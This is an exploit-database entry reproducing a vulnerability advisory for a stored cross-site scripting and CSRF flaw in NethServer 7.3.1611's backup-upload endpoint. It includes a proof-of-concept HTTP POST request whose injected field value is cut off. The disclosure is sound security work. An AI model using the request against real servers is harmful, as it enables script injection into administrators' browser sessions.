NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting Vulnerabilities

ID 1337DAY-ID-28388
Type zdt
Reporter LiquidWorm
Modified 2017-08-29T00:00:00


Exploit for jsp platform in category web applications

                                            NethServer 7.3.1611 (Upload.json) CSRF Script Insertion Vulnerability
Product web page:
Affected version: 7.3.1611-u1-x86_64
Summary: NethServer is an operating system for the Linux enthusiast,
designed for small offices and medium enterprises. It's simple, secure
and flexible.
Desc: NethServer suffers from an authenticated stored XSS vulnerability.
Input passed to the 'BackupConfig[Upload][Description]' POST parameter is
not properly sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
Tested on: Kernel 3.10.0.-514.el7.x86_64 on an x86_64
           CentOS Linux 7.3.1611 (Core)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Advisory ID: ZSL-2017-5432
Advisory URL:
PoC request:
POST /en-US/BackupConfig/Upload.json HTTP/1.1
Connection: close
Content-Length: 15762
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8FfEu2Tn6fUOnT80
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Cookie: nethgui=4igflab8fmbi5aq26pvsp5r0f2
Content-Disposition: form-data; name="arc"; filename="backup-config.7z.xz"
Content-Type: application/x-xz
[xz content omitted]
Content-Disposition: form-data; name="BackupConfig[Upload][Description]"

# [2018-04-03]  #